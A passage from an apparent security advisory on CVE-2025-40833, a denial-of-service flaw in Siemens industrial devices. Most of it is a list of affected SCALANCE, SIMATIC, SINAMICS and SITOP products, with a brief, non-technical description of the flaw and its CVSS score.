(6GK5408-4GP00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM408-4C (L3 int.) (6GK5408-4GQ00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM408-8C (6GK5408-8GS00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM408-8C (L3 int.) (6GK5408-8GR00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM416-4C (6GK5416-4GS00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XM416-4C (L3 int.) (6GK5416-4GR00-2AM2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on front) (6GK5324-0GG00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on front) (6GK5324-0GG10-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on rear) (6GK5324-0GG00-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (230V, ports on rear) (6GK5324-0GG10-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on front) (6GK5324-0GG00-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on front) (6GK5324-0GG10-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on rear) (6GK5324-0GG00-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M (24V, ports on rear) (6GK5324-0GG10-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M TS (24V) (6GK5324-0GG00-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-12M TS (24V) (6GK5324-0GG10-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front) (6GK5324-4GG00-3ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front) (6GK5324-4GG10-3ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG00-3JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG10-3JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on front) (6GK5324-4GG00-1ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on front) (6GK5324-4GG10-1ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on rear) (6GK5324-4GG00-1JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (24V, ports on rear) (6GK5324-4GG10-1JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front) (6GK5324-4GG00-4ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front) (6GK5324-4GG10-4ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG00-4JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG10-4JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on front) (6GK5324-4GG00-2ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on front) (6GK5324-4GG10-2ER2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on rear) (6GK5324-4GG00-2JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M EEC (2x 24V, ports on rear) (6GK5324-4GG10-2JR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on front) (6GK5324-4QG00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on front) (6GK5324-4QG10-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on rear) (6GK5324-4QG00-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (230V, ports on rear) (6GK5324-4QG10-3HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on front) (6GK5324-4QG00-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on front) (6GK5324-4QG10-1AR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on rear) (6GK5324-4QG00-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE (24V, ports on rear) (6GK5324-4QG10-1HR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE TS (24V, ports on front) (6GK5324-4QG00-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR324-4M PoE TS (24V, ports on front) (6GK5324-4QG10-1CR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 1x230V (6GK5524-8GS00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 1x230V (L3 int.) (6GK5524-8GR00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 24V (6GK5524-8GS00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 24V (L3 int.) (6GK5524-8GR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 2x230V (6GK5524-8GS00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR524-8C, 2x230V (L3 int.) (6GK5524-8GR00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 1x230V (6GK5526-8GS00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 1x230V (L3 int.) (6GK5526-8GR00-3AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 24V (6GK5526-8GS00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 24V (L3 int.) (6GK5526-8GR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 2x230V (6GK5526-8GS00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR526-8C, 2x230V (L3 int.) (6GK5526-8GR00-4AR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (6GK5528-0AA00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (2HR2, L3 int.) (6GK5528-0AR00-2HR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (2HR2) (6GK5528-0AA00-2HR2) vers:all/* (CVE-2025-40833) SCALANCE XR528-6M (L3 int.) (6GK5528-0AR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (6GK5552-0AA00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (2HR2, L3 int.) (6GK5552-0AR00-2AR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (2HR2) (6GK5552-0AA00-2HR2) vers:all/* (CVE-2025-40833) SCALANCE XR552-12M (2HR2) (6GK5552-0AR00-2HR2) vers:all/* (CVE-2025-40833) SIMATIC CFU DIQ (6ES7655-5PX31-1XX0) vers:intdot/<2.0.0 (CVE-2025-40833) SIMATIC CFU PA (6ES7655-5PX11-0XX0) vers:intdot/<2.0.0 (CVE-2025-40833) SIMATIC CFU PA (6ES7655-5PX11-1XX0) vers:intdot/<2.0.0 (CVE-2025-40833) SIMATIC ET 200pro IM 154-8 PN/DP CPU (6ES7154-8AB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200pro IM 154-8F PN/DP CPU (6ES7154-8FB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200pro IM 154-8FX PN/DP CPU (6ES7154-8FX00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200S IM 151-8 PN/DP CPU (6ES7151-8AB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200S IM 151-8F PN/DP CPU (6ES7151-8FB01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC ET 200SP HA IM155-6 PN vers:intdot/<1.3 (CVE-2025-40833) SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 314C-2 PN/DP (6ES7314-6EH04-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 315-2 PN/DP (6ES7315-2EH14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 315F-2 PN/DP (6ES7315-2FJ14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 315T-3 PN/DP (6ES7315-7TJ10-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317-2 PN/DP (6ES7317-2EK14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317F-2 PN/DP (6ES7317-2FK14-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317T-3 PN/DP (6ES7317-7TK10-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 317TF-3 PN/DP (6ES7317-7UL10-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 319-3 PN/DP (6ES7318-3EL01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-300 CPU 319F-3 PN/DP (6ES7318-3FL01-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 412-2 PN V7 (6ES7412-2EK07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 414-3 PN/DP V7 (6ES7414-3EM07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 414F-3 PN/DP V7 (6ES7414-3FM07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 416-3 PN/DP V7 (6ES7416-3ES07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 CPU 416F-3 PN/DP V7 (6ES7416-3FS07-0AB0) vers:all/* (CVE-2025-40833) SIMATIC S7-400 H V6 CPU family (incl. SIPLUS variants) vers:all/* (CVE-2025-40833) SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants) vers:intdot/<10.2 (CVE-2025-40833) SIMATIC S7-410 V8 CPU family (incl. SIPLUS variants) vers:intdot/<8.3 (CVE-2025-40833) SIMIT UNIT V10 vers:all/* (CVE-2025-40833) SIMIT UNIT V11 vers:all/* (CVE-2025-40833) SINAMICS CBE20 vers:all/* (CVE-2025-40833) SINAMICS G115D vers:all/* (CVE-2025-40833) SINAMICS G120 (incl. SIPLUS variants) vers:all/* (CVE-2025-40833) SINAMICS G120C vers:all/* (CVE-2025-40833) SINAMICS G120D vers:all/* (CVE-2025-40833) SINAMICS G120X vers:all/* (CVE-2025-40833) SINAMICS G120XA vers:all/* (CVE-2025-40833) SINAMICS G130 vers:all/* (CVE-2025-40833) SINAMICS G150 vers:all/* (CVE-2025-40833) SINAMICS S110 vers:all/* (CVE-2025-40833) SINAMICS S120 (incl. SIPLUS variants) vers:all/* (CVE-2025-40833) SINAMICS S150 vers:all/* (CVE-2025-40833) SINUMERIK 840D sl vers:all/* (CVE-2025-40833) SIPLUS ET 200S IM 151-8 PN/DP CPU (6AG1151-8AB01-7AB0) vers:all/* (CVE-2025-40833) SIPLUS ET 200S IM 151-8F PN/DP CPU (6AG1151-8FB01-2AB0) vers:all/* (CVE-2025-40833) SIPLUS NET IE/PB link PN IO (6AG1411-5AB10-2AA0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 314C-2 PN/DP (6AG1314-6EH04-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 315-2 PN/DP (6AG1315-2EH14-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 315F-2 PN/DP (6AG1315-2FJ14-2AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 317-2 PN/DP (6AG1317-2EK14-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-300 CPU 317F-2 PN/DP (6AG1317-2FK14-2AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-400 CPU 414-3 PN/DP V7 (6AG1414-3EM07-7AB0) vers:all/* (CVE-2025-40833) SIPLUS S7-400 CPU 416-3 PN/DP V7 (6AG1416-3ES07-7AB0) vers:all/* (CVE-2025-40833) SITOP PSU8600 1AC 20 A/4x5 A PN (6EP3336-8MB00-2CY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 20 A PN (6EP3436-8SB00-2AY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 20 A/4x5 A PN (6EP3436-8MB00-2CY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 40 A PN (6EP3437-8SB00-2AY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 40 A/4x10 A PN (6EP3437-8MB00-2CY0) vers:all/* (CVE-2025-40833) SITOP PSU8600 3AC 40 A/4x10A EIP (6EP3437-8MB10-2CY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 10 A Ethernet/ PROFINET (6EP4134-3AB00-2AY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 20 A Ethernet/ PROFINET (6EP4136-3AB00-2AY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 40 A Ethernet/ PROFINET (6EP4137-3AB00-2AY0) vers:all/* (CVE-2025-40833) SITOP UPS1600 EX 20 A Ethernet PROFINET (6EP4136-3AC00-2AY0) vers:all/* (CVE-2025-40833) CVSS Vendor Equipment Vulnerabilities v3 7.5 Siemens Siemens Industrial Devices NULL Pointer Dereference Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-40833 The affected devices contain a null pointer dereference vulnerability while processing specially crafted IPv4 requests. This could allow an attacker to cause denial of service condition. A manual restart is required to recover the system. View CVE Details Affected Products Siemens Industrial Devices Vendor: Siemens Product Version: IE/PB LINK HA (6GK1411-5BB00), IE/PB link PN IO (6GK1411-5AB10), RUGGEDCOM RM1224 LTE(4G) EU (6GK6108-4AM00-2BA2), RUGGEDCOM RM1224 LTE(4G) NAM (6GK6108-4AM00-2DA2), SCALANCE M804PB (6GK5804-0AP00-2AA2), SCALANCE M812-1 ADSL-Router (6GK5812-1AA00-2AA2), SCALANCE M812-1 ADSL-Router (6GK5812-1BA00-2AA2), SCALANCE M816-1 ADSL-Router (6GK5816-1AA00-2AA2), SCALANCE M816-1 ADSL-Router (6GK5816-1BA00-2AA2), SCALANCE M826-2 SHDSL-Router (6GK5826-2AB00-2AB2), SCALANCE M874-2 (6GK5874-2AA00-2AA2), SCALANCE M874-3 (6GK5874-3AA00-2AA2), SCALANCE M874-3 3G-Router (CN) (6GK5874-3AA00-2FA2), SCALANCE M876-3 (6GK5876-3AA02-2BA2), SCALANCE M876-3 (ROK) (6GK5876-3AA02-2EA2), SCALANCE M876-4 (6GK5876-4AA10-2BA2), SCALANCE M876-4 (EU) (6GK5876-4AA00-2BA2), SCALANCE M876-4 (NAM) (6GK5876-4AA00-2DA2), SCALANCE MUB852-1 (A1) (6GK5852-1EA10-1AA1), SCALANCE MUB852-1 (B1) (6GK5852-1EA10-1BA1), SCALANCE MUM853-1 (A1) (6GK5853-2EA10-2AA1), SCALANCE MUM853-1 (B1) (6GK5853-2EA10-2BA1), SCALANCE MUM853-1 (EU) (6GK5853-2EA00-2DA1), SCALANCE MUM856-1 (A1) (6GK5856-2EA10-3AA1), SCALANCE MUM856-1 (B1) (6GK5856-2EA10-3BA1), SCALANCE MUM856-1 (CN) (6GK5856-2EA00-3FA1), SCALANCE MUM856-1 (EU) (6GK5856-2EA00-3DA1), SCALANCE MUM856-1 (RoW) (6GK5856-2EA00-3AA1), SCALANCE S615 EEC LAN-Router (6GK5615-0AA01-2AA2), SCALANCE S615 LAN-Router (6GK5615-0AA00-2AA2), SCALANCE SC622-2C (6GK5622-2GS00-2AC2), SCALANCE SC626-2C (6GK5626-2GS00-2AC2), SCALANCE SC632-2C (6GK5632-2GS00-2AC2), SCALANCE SC636-2C (6GK5636-2GS00-2AC2), SCALANCE SC642-2C (6GK5642-2GS00-2AC2), SCALANCE SC646-2C (6GK5646-2GS00-2AC2), SCALANCE W1748-1 M12 (6GK5748-1GY01-0AA0), SCALANCE W1748-1 M12 (6GK5748-1GY01-0TA0), SCALANCE W1788-1 M12 (6GK5788-1GY01-0AA0), SCALANCE W1788-2 EEC M12 (6GK5788-2GY01-0TA0), SCALANCE W1788-2 M12 (6GK5788-2GY01-0AA0), SCALANCE W1788-2IA M12 (6GK5788-2HY01-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0), SCALANCE WAB762-1 (6GK5762-1AJ00-6AA0), SCALANCE WAM763-1 (6GK5763-1AL00-7DA0), SCALANCE WAM763-1 (ME) (6GK5763-1AL00-7DC0), SCALANCE WAM763-1 (US) (6GK5763-1AL00-7DB0), SCALANCE WAM766-1 (6GK5766-1GE00-7DA0), SCALANCE WAM766-1 (ME) (6GK5766-1GE00-7DC0), SCALANCE WAM766-1 (US) (6GK5766-1GE00-7DB0), SCALANCE WAM766-1 EEC (6GK5766-1GE00-7TA0), SCALANCE WAM766-1 EEC (ME) (6GK5766-1GE00-7TC0), SCALANCE WAM766-1 EEC (US) (6GK5766-1GE00-7TB0), SCALANCE WUB762-1 (6GK5762-1AJ00-1AA0), SCALANCE WUB762-1 iFeatures (6GK5762-1AJ00-2AA0), SCALANCE WUM763-1 (6GK5763-1AL00-3AA0), SCALANCE WUM763-1 (6GK5763-1AL00-3DA0), SCALANCE WUM763-1 (US) (6GK5763-1AL00-3AB0), SCALANCE WUM763-1 (US) (6GK5763-1AL00-3DB0), SCALANCE WUM766-1 (6GK5766-1GE00-3DA0), SCALANCE WUM766-1 (ME) (6GK5766-1GE00-3DC0), SCALANCE WUM766-1 (USA) (6GK5766-1GE00-3DB0), SCALANCE X204-2 (6GK5204-2BB10-2AA3), SCALANCE X204-2FM (6GK5204-2BB11-2AA3), SCALANCE X204-2LD (6GK5204-2BC10-2AA3), SCALANCE X204-2LD TS (6GK5204-2BC10-2CA2), SCALANCE X204-2TS (6GK5204-2BB10-2CA2), SCALANCE X206-1 (6GK5206-1BB10-2AA3), SCALANCE X206-1LD (6GK5206-1BC10-2AA3), SCALANCE X208 (6GK5208-0BA10-2AA3), SCALANCE X208PRO (6GK5208-0HA10-2AA6), SCALANCE X212-2 (6GK5212-2BB00-2AA3), SCALANCE X212-2LD (6GK5212-2BC00-2AA3), SCALANCE X216 (6GK5216-0BA00-2AA3), SCALANCE X224 (6GK5224-0BA00-2AA3), SCALANCE X302-7 EEC (230V, coated) (6GK5302-7GD00-3GA3), SCALANCE X302-7 EEC (230V) (6GK5302-7GD00-3EA3), SCALANCE X302-7 EEC (24V, coated) (6GK5302-7GD00-1GA3), SCALANCE X302-7 EEC (24V) (6GK5302-7GD00-1EA3), SCALANCE X302-7 EEC (2x 230V, coated) (6GK5302-7GD00-4GA3), SCALANCE X302-7 EEC (2x 230V) (6GK5302-7GD00-4EA3), SCALANCE X302-7 EEC (2x 24V, coated) (6GK5302-7GD00-2GA3), SCALANCE X302-7 EEC (2x 24V) (6GK5302-7GD00-2EA3), SCALANCE X304-2FE (6GK5304-2BD00-2AA3), SCALANCE X306-1LD FE (6GK5306-1BF00-2AA3), SCALANCE X307-2 EEC (230V, coated) (6GK5307-2FD00-3GA3), SCALANCE X307-2 EEC (230V) (6GK5307-2FD00-3EA3), SCALANCE X307-2 EEC (24V, coated) (6GK5307-2FD00-1GA3), SCALANCE X307-2 EEC (24V) (6GK5307-2FD00-1EA3), SCALANCE X307-2 EEC (2x 230V, coated) (6GK5307-2FD00-4GA3), SCALANCE X307-2 EEC (2x 230V) (6GK5307-2FD00-4EA3), SCALANCE X307-2 EEC (2x 24V, coated) (6GK5307-2FD00-2GA3), SCALANCE X307-2 EEC (2x 24V) (6GK5307-2FD00-2EA3), SCALANCE X307-3 (6GK5307-3BL00-2AA3), SCALANCE X307-3 (6GK5307-3BL10-2AA3), SCALANCE X307-3LD (6GK5307-3BM00-2AA3), SCALANCE X307-3LD (6GK5307-3BM10-2AA3), SCALANCE X308-2 (6GK5308-2FL00-2AA3), SCALANCE X308-2 RD (inkl. SIPLUS variants), SCALANCE X308-2LD (6GK5308-2FM00-2AA3), SCALANCE X308-2LD (6GK5308-2FM10-2AA3), SCALANCE X308-2LH (6GK5308-2FN00-2AA3), SCALANCE X308-2LH (6GK5308-2FN10-2AA3), SCALANCE X308-2LH+ (6GK5308-2FP00-2AA3), SCALANCE X308-2LH+ (6GK5308-2FP10-2AA3), SCALANCE X308-2M (6GK5308-2GG00-2AA2), SCALANCE X308-2M (6GK5308-2GG10-2AA2), SCALANCE X308-2M PoE (6GK5308-2QG00-2AA2), SCALANCE X308-2M PoE (6GK5308-2QG10-2AA2), SCALANCE X308-2M TS (6GK5308-2GG00-2CA2), SCALANCE X308-2M TS (6GK5308-2GG10-2CA2), SCALANCE X310 (6GK5310-0FA00-2AA3), SCALANCE X310 (6GK5310-0FA10-2AA3), SCALANCE X310FE (6GK5310-0BA00-2AA3), SCALANCE X310FE (6GK5310-0BA10-2AA3), SCALANCE X320-1 FE (6GK5320-1BD00-2AA3), SCALANCE X320-1-2LD FE (6GK5320-3BF00-2AA3), SCALANCE X408-2 (6GK5408-2FD00-2AA2), SCALANCE XF204 (6GK5204-0BA00-2AF2), SCALANCE XF204-2 (6GK5204-2BC00-2AF2), SCALANCE XF206-1 (6GK5206-1BC00-2AF2), SCALANCE XF208 (6GK5208-0BA00-2AF2), SCALANCE XM408-4C (6GK5408-4GP00-2AM2), SCALANCE XM408-4C (L3 int.) (6GK5408-4GQ00-2AM2), SCALANCE XM408-8C (6GK5408-8GS00-2AM2), SCALANCE XM408-8C (L3 int.) (6GK5408-8GR00-2AM2), SCALANCE XM416-4C (6GK5416-4GS00-2AM2), SCALANCE XM416-4C (L3 int.) (6GK5416-4GR00-2AM2), SCALANCE XR324-12M (230V, ports on front) (6GK5324-0GG00-3AR2), SCALANCE XR324-12M (230V, ports on front) (6GK5324-0GG10-3AR2), SCALANCE XR324-12M (230V, ports on rear) (6GK5324-0GG00-3HR2), SCALANCE XR324-12M (230V, ports on rear) (6GK5324-0GG10-3HR2), SCALANCE XR324-12M (24V, ports on front) (6GK5324-0GG00-1AR2), SCALANCE XR324-12M (24V, ports on front) (6GK5324-0GG10-1AR2), SCALANCE XR324-12M (24V, ports on rear) (6GK5324-0GG00-1HR2), SCALANCE XR324-12M (24V, ports on rear) (6GK5324-0GG10-1HR2), SCALANCE XR324-12M TS (24V) (6GK5324-0GG00-1CR2), SCALANCE XR324-12M TS (24V) (6GK5324-0GG10-1CR2), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front) (6GK5324-4GG00-3ER2), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on front) (6GK5324-4GG10-3ER2), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG00-3JR2), SCALANCE XR324-4M EEC (100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG10-3JR2), SCALANCE XR324-4M EEC (24V, ports on front) (6GK5324-4GG00-1ER2), SCALANCE XR324-4M EEC (24V, ports on front) (6GK5324-4GG10-1ER2), SCALANCE XR324-4M EEC (24V, ports on rear) (6GK5324-4GG00-1JR2), SCALANCE XR324-4M EEC (24V, ports on rear) (6GK5324-4GG10-1JR2), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front) (6GK5324-4GG00-4ER2), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on front) (6GK5324-4GG10-4ER2), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG00-4JR2), SCALANCE XR324-4M EEC (2x 100-240VAC/60-250VDC, ports on rear) (6GK5324-4GG10-4JR2), SCALANCE XR324-4M EEC (2x 24V, ports on front) (6GK5324-4GG00-2ER2), SCALANCE XR324-4M EEC (2x 24V, ports on front) (6GK5324-4GG10-2ER2), SCALANCE XR324-4M EEC (2x 24V, ports on rear) (6GK5324-4GG00-2JR2), SCALANCE XR324-4M EEC (2x 24V, ports on rear) (6GK5324-4GG10-2JR2), SCALANCE XR324-4M PoE (230V, ports on front) (6GK5324-4QG00-3AR2), SCALANCE XR324-4M PoE (230V, ports on front) (6GK5324-4QG10-3AR2), SCALANCE XR324-4M PoE (230V, ports on rear) (6GK5324-4QG00-3HR2), SCALANCE XR324-4M PoE (230V, ports on rear) (6GK5324-4QG10-3HR2), SCALANCE XR324-4M PoE (24V, ports on front) (6GK5324-4QG00-1AR2), SCALANCE XR324-4M PoE (24V, ports on front) (6GK5324-4QG10-1AR2), SCALANCE XR324-4M PoE (24V, ports on rear) (6GK5324-4QG00-1HR2), SCALANCE XR324-4M PoE (24V, ports on rear) (6GK5324-4QG10-1HR2), SCALANCE XR324-4M PoE TS (24V, ports on front) (6GK5324-4QG00-1CR2), SCALANCE XR324-4M PoE TS (24V, ports on front) (6GK5324-4QG10-1CR2), SCALANCE XR524-8C, 1x230V (6GK5524-8GS00-3AR2), SCALANCE XR524-8C, 1x230V (L3 int.) (6GK5524-8GR00-3AR2), SCALANCE XR524-8C, 24V (6GK5524-8GS00-2AR2), SCALANCE XR524-8C, 24V (L3 int.) (6GK5524-8GR00-2AR2), SCALANCE XR524-8C, 2x230V (6GK5524-8GS00-4AR2), SCALANCE 